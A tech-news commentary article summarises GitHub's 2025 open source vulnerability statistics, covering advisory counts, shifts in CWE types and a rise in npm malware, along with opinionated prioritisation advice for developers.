2025 Open Source Vulnerability Trends

GitHub reviewed just 4,101 open source advisories in 2025—the fewest since 2021. But don't pop the champagne; new vulnerabilities jumped 19%, signaling no safety net yet.

The AI Catchup 4 min read
Line chart showing decline in GitHub reviewed open source advisories from 2021-2025 with new vuln spike

Key Takeaways

  • Reviewed advisories hit 4-year low at 4,101, but new vulns up 19% YoY.
  • CWE shifts: Resource exhaustion and SSRF surged; tagging improved 85%.
  • npm malware spiked 69%; prioritize EPSS + CVSS for real threats.

GitHub’s security dashboard blinks with a counter frozen at 4,101: reviewed advisories for 2025, lowest tally since 2021.

Open source vulnerability trends tell a tale of cleared decks, not cleaner code. GitHub’s team, curating the Advisory Database and doling out CVE IDs, crunched the numbers. Fewer total reviews? Sure. But strip out the ancient backlog, and newly reported vulns spiked 19% year-over-year. They’re simply running dry on dusty, unreviewed relics—most of which got a quick glance and dismissed as irrelevant to live packages anyway.

Fewer advisories reviewed doesn’t mean fewer vulnerabilities were reported. The drop is because GitHub reviewed far fewer older vulnerabilities. When you look only at newly reported vulnerabilities from our sources, GitHub actually reviewed 19% more advisories year over year.

That’s GitHub’s own words, straight from the analysts. Dependabot users: expect fewer alerts on zombie vulns haunting your deps.

Why the Advisory Drop Masks Real Risks?

Look. They’re out of old fish to gut. New reports keep pouring in, steady as ever. Unreviewed tags? Often just a polite ‘nope, doesn’t touch our ecosystems.’ Spot one that does? Ping them— they’ll review.

Ecosystem split stays familiar, bar one outlier. Go modules? Overrepresented by 6%, thanks to internal audits chasing ghosts in patchy coverage. JavaScript, Ruby, Python hold their usual spots. No seismic shift.

But CWE types? That’s where it gets spicy. Cross-site scripting (CWE-79) reigns supreme—672 advisories, unchanged. Path traversal (CWE-22) climbs to 214. Then jumps: incorrect authorization (CWE-863) vaults nine spots to 169, mostly reclassifications from broader access control CWEs that the CWE overlords now frown upon.

Resource exhaustion duo—CWE-400 (154), CWE-770 (136)—plus unsafe deserialization (CWE-502, 134) and SSRF (CWE-918, 103) all surged. Why? Coordinated hunts, maybe. Or attackers loving those vectors.

Big win: CWE tagging sharpened up. Advisories sans tags plummeted 85%, from 452 to 65. CWE-20 (improper input validation) lingers at 154, but now paired with specifics—like the exact exhaustion trick. Actionable data for your triage.

Here’s my take, absent from GitHub’s spin: this mirrors the post-Log4Shell frenzy of 2022, when backlog-clearing masqueraded as progress. Back then, vulns exploded; today, we’re prepping for AI-fueled discovery engines that could double new reports by 2027. Don’t sleep—it’s not safer open source, just better bookkeeping.

Is Go Becoming Vulnerability Central?

Six percent overrep. Dedicated campaigns unearthed misses. Fair. But watch: Go’s simplicity lures devs, yet its stdlib gaps invite custom exploits. Prediction? If npm malware keeps spiking (more later), Go could be next ecosystem domino.

Prioritization? GitHub pushes CVSS for impact, EPSS for exploit odds in 30 days. Charts show most vulns moderate-high CVSS. Low ones? Underreported—too meh for researchers.

EPSS shines on CISA’s exploited list: nails the likely hits. CVSS flags more criticals but drowns in noise. Blend ‘em. GitHub’s auto-triage docs let you filter by CWE—do it.

npm malware? 69% surge. SHA1-Hulud campaigns and kin flooded the registry. Typosquatting, trojanized deps—classic. Open source’s free-for-all vibe bites back.

Market dynamic: OSS supply chain’s a $10B risk pool by 2026, per Gartner echoes. Firms like Sonatype thrive on scans; GitHub’s alerts are table stakes. But maintainers? Overloaded. Vulns persist because fixes lag adoption.

Sharp position: GitHub’s ‘quality improvements’ in tagging? PR gloss. Real fix? Fund maintainers, not just curators. Else, 2026 repeats 2025—with fancier CWEs.

And npm? That 69%? Not a blip. Blockchain scams, crypto-miners disguised as utils. Devs npm i blindly; attackers feast.

So, devs. Patch high-EPSS first. Ecosystems matter less than vectors now—exhaustion’s the silent killer.

What Should Devs Do About 2025 Trends?

Filter alerts. Use EPSS thresholds. Audit Go if you’re there. npm? Vet packages like your job depends on it—because it does.

Historical parallel: Heartbleed 2014. OSS woke up then. We’re due another wake-up; this data’s the alarm.

🧬 Related Insights

Frequently Asked Questions

What caused the drop in GitHub advisories for 2025?

Mostly clearing old, irrelevant vulns—new ones rose 19%.

Why is CWE-79 still king in open source vulns?

XSS everywhere; web apps gonna web.

How bad is npm malware in 2025?

69% jump from campaigns like SHA1-Hulud—scan ruthlessly.

Elena Vasquez
Written by
Elena Vasquez

Senior editor and generalist covering the biggest stories with a sharp, skeptical eye.

Frequently asked questions

What caused the drop in <a href="/tag/github-advisories/">GitHub advisories</a> for 2025?
Mostly clearing old, irrelevant vulns—new ones rose 19%.
Why is CWE-79 still king in open source vulns?
XSS everywhere; web apps gonna web.
How bad is npm malware in 2025?
69% jump from campaigns like SHA1-Hulud—scan ruthlessly.
#cve-2025 #cwe-trends #github-advisories

Worth sharing?

Get the best AI stories of the week in your inbox — no noise, no spam.

Originally reported by GitHub Blog

Related Stories

📬

Stay in the loop

The week's most important stories from The AI Catchup, delivered once a week.

No spam. Unsubscribe any time.